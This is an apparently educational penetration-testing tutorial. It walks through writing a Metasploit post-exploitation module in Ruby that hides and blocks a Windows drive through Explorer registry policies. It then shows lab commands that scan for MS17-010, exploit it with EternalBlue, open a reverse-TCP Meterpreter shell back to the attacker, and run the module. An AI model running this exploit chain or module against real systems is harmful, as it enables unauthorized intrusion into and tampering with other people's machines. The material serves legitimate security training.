Metasploit 5: Writing and Testing a Post-Osmosis Module


Introduction

Once a target host has been compromised, post-exploitation modules are used to carry out specific tasks through the session you already hold. In this article we write a post-exploitation module in Ruby, load it into Metasploit, and run it against a Meterpreter session.

Experimental Environment

  • Kali Linux 2019.1 VM (amd64)
  • Target Host: Windows Server 2008 R2
  • Metasploit v5.0.2

Writing the Post-Exploitation Module

A post-exploitation module is a Ruby file with a .rb suffix. The one below hides a chosen drive letter from Windows Explorer and blocks Explorer from opening it, after you already have a session on the server. It does this by writing two Explorer policy values under HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer: NoDrives (hide the drive) and NoViewOnDrive (refuse to open it). Both values are bitmasks in which bit 0 is A:, bit 1 is B:, and so on up to bit 25 for Z:, so a single drive letter maps to 2 raised to its index (D: is 8). Note that these policies only affect the Explorer shell; cmd.exe, PowerShell and any other program can still read and write the drive, and the module overwrites whatever mask was already set.

# This module requires Metasploit: https://metasploit.com/download
# Hides a drive letter in Windows Explorer (NoDrives) and blocks Explorer
# from opening it (NoViewOnDrive) on a host you already have a Meterpreter
# session on. Both policies only affect the Explorer shell; cmd.exe,
# PowerShell and other programs can still access the drive.

require 'msf/core'

class MetasploitModule < Msf::Post
  include Msf::Post::Windows::Registry

  # No spaces inside the path: the original had "HKLM \\ Software \\ ..." which
  # is not a valid registry key.
  REGISTRY_PATH = 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer'.freeze

  def initialize(info = {})
    super(update_info(info,
      'Name'         => 'Windows Manage Hide and Restrict Drive',
      'Description'  => %q{
        Sets the NoDrives and NoViewOnDrive Explorer policies so that the
        chosen drive letter is hidden from, and cannot be opened in, Explorer.
      },
      'License'      => MSF_LICENSE,
      'Author'       => ['Neroqi'],
      'Platform'     => ['win'],
      'SessionTypes' => ['meterpreter']
    ))
    register_options([
      OptString.new('DriveCharacter', [true, 'Drive letter to hide and restrict (A-Z)'])
    ])
  end

  # NoDrives / NoViewOnDrive are bitmasks: bit 0 = A, bit 1 = B, ... bit 25 = Z.
  # The lookup table in the original only covered A-G and returned nil for
  # anything else; computing 2 ** index handles every letter.
  def drive_converter(drive)
    letter = drive.to_s.strip.upcase
    unless letter =~ /\A[A-Z]\z/
      fail_with(Failure::BadConfig, "DriveCharacter must be a single letter A-Z, got '#{drive}'")
    end
    1 << (letter.ord - 'A'.ord)
  end

  def run
    letter = datastore['DriveCharacter'].to_s.strip.upcase
    drive_int = drive_converter(letter)

    if registry_key_exist?(REGISTRY_PATH)
      print_good('Registry path exists, writing values directly')
    else
      print_status('Registry path does not exist, creating it first')
      registry_createkey(REGISTRY_PATH, REGISTRY_VIEW_64_BIT)
    end

    # REG_DWORD data is sent as an integer; this overwrites any existing mask.
    registry_setvaldata(REGISTRY_PATH, 'NoDrives', drive_int, 'REG_DWORD', REGISTRY_VIEW_64_BIT)
    print_good("Hiding #{letter}: drive (NoDrives = #{drive_int})")
    registry_setvaldata(REGISTRY_PATH, 'NoViewOnDrive', drive_int, 'REG_DWORD', REGISTRY_VIEW_64_BIT)
    print_good("Restricting Explorer access to #{letter}: drive (NoViewOnDrive = #{drive_int})")
    print_good("Disabled #{letter}: drive; the policy applies once Explorer restarts")
  end
end
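The module above hard-codes the mask for a single letter. The following is an added example, not part of the article's module, showing the general NoDrives / NoViewOnDrive bitmask computation: building a mask for any set of drive letters, decoding a mask read back from a target, and merging a new drive into an existing mask so that drives already hidden are not clobbered. It runs stand-alone with plain Ruby; the function names (drive_mask, mask_to_drives, add_drive_to_mask) are my own. The all-drives value 0x03FFFFFF follows from the 26-bit layout (bits 0 through 25 set).

```ruby
# Added example: NoDrives / NoViewOnDrive bitmask arithmetic.
# Layout of the policy value: bit 0 = A, bit 1 = B, ... bit 25 = Z.

ALL_DRIVES_MASK = 0x03FFFFFF # bits 0..25 set: every drive letter hidden

# Build the mask for one or more drive letters.
# drive_mask('D') => 8, drive_mask('D', 'E') => 24.
# Raises ArgumentError on anything that is not a single letter A-Z.
def drive_mask(*letters)
  letters.flatten.reduce(0) do |mask, l|
    letter = l.to_s.strip.upcase
    unless letter.match?(/\A[A-Z]\z/)
      raise ArgumentError, "not a drive letter: #{l.inspect}"
    end
    mask | (1 << (letter.ord - 'A'.ord))
  end
end

# Decode a mask read from the target back into drive letters.
# mask_to_drives(24) => ["D", "E"]
def mask_to_drives(mask)
  unless (0..ALL_DRIVES_MASK).cover?(mask)
    raise ArgumentError, "mask out of range for 26 drive letters: #{mask}"
  end
  ('A'..'Z').select.with_index { |_, i| mask[i] == 1 } # Integer#[] reads bit i
end

# Merge a new drive into an existing policy value instead of overwriting it.
# add_drive_to_mask(8, 'C') => 12 (D: stays hidden, C: is added)
def add_drive_to_mask(existing, letter)
  existing | drive_mask(letter)
end

if __FILE__ == $PROGRAM_NAME
  puts "D            -> #{drive_mask('D')}"
  puts "D, E         -> #{drive_mask('D', 'E')}"
  puts "all drives   -> 0x#{ALL_DRIVES_MASK.to_s(16)}"
  puts "24 hides     -> #{mask_to_drives(24).join(', ')}"
  puts "add C: to 8  -> #{add_drive_to_mask(8, 'C')}"
end
```

If you adapt the module to read the current NoDrives value before writing (for example with the mixin's registry_getvaldata), add_drive_to_mask is the merge you want, and mask_to_drives is what you would use to report which drives were already hidden.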

Testing the Post-Exploitation Module

To test the module, copy it into the post/windows/manage directory of the Metasploit installation. The file name (without .rb) becomes the last part of the module path, so the file must be named disable_drive_Neroqi.rb to be selectable as post/windows/manage/disable_drive_Neroqi later.

cp disable_drive_Neroqi.rb /usr/share/metasploit-framework/modules/post/windows/manage/

We then need to reload the Metasploit module using reload_all in msfconsole.

msf5> reload_all

Next, scan the target host with nmap to check for the MS17-010 vulnerability. The vuln script category includes smb-vuln-ms17-010, which probes SMB on port 445; the unsafe argument must be passed as a script-args assignment, not as a bare word.

root@kali:~# nmap -sV -p - --script vuln --script-args=unsafe=1 192.168.110.130

Confirm the result with Metasploit's own auxiliary/scanner/smb/smb_ms17_010 module, which reports the host as likely VULNERABLE to MS17-010 if the check succeeds.

msf5> use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010)> set RHOSTS 192.168.110.130
RHOSTS => 192.168.110.130
msf5 auxiliary(scanner/smb/smb_ms17_010)> run

Then use exploit/windows/smb/ms17_010_eternalblue to obtain a Meterpreter session. The x64 payload matches the 64-bit 2008 R2 target. LHOST is the address the reverse shell connects back to, so it must be the Kali VM's address, not the target's (the original transcript set it to 192.168.110.130, the target itself, which would never produce a session). Once the session opens, type background to return to the msf5 prompt and note the session ID from sessions -l.

msf5> use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue)> set RHOST 192.168.110.130
RHOST => 192.168.110.130
msf5 exploit(windows/smb/ms17_010_eternalblue)> set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue)> set LHOST <Kali IP>
LHOST => <Kali IP>
msf5 exploit(windows/smb/ms17_010_eternalblue)> set LPORT 8000
LPORT => 8000
msf5 exploit(windows/smb/ms17_010_eternalblue)> run

With the session backgrounded, select post/windows/manage/disable_drive_Neroqi, point SESSION at the Meterpreter session ID, and run it to disable the D drive.

msf5> use post/windows/manage/disable_drive_Neroqi
msf5 post(windows/manage/disable_drive_Neroqi)> set DriveCharacter D
DriveCharacter => D
msf5 post(windows/manage/disable_drive_Neroqi)> set SESSION 1
SESSION => 1
msf5 post(windows/manage/disable_drive_Neroqi)> run

Finally, log in to the target host and verify that the change took effect.

Open "My Computer": the D drive is no longer listed.
Try to open the D drive from "Disk Management": Windows reports an error and the drive cannot be accessed.

Two caveats when verifying. The policy values are read by Explorer at start-up, so if the drive is still visible, restart explorer.exe or log off and back on. And the restriction is shell-only: from cmd.exe or PowerShell the drive remains fully accessible, so this hides the drive from a user browsing in Explorer rather than protecting its contents. You can read the written values back from the session with Meterpreter's reg queryval command (key HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, value NoDrives or NoViewOnDrive) to confirm that the mask is 8 for D:.

Conclusion

In this article we wrote a post-exploitation module in Ruby, loaded it into Metasploit, and ran it against a Meterpreter session obtained through MS17-010, using it to hide a drive and block Explorer access to it on the target host. The same structure (a Msf::Post subclass, a registry mixin, options registered in initialize, and the work done in run) applies to any post-exploitation module you write for Metasploit.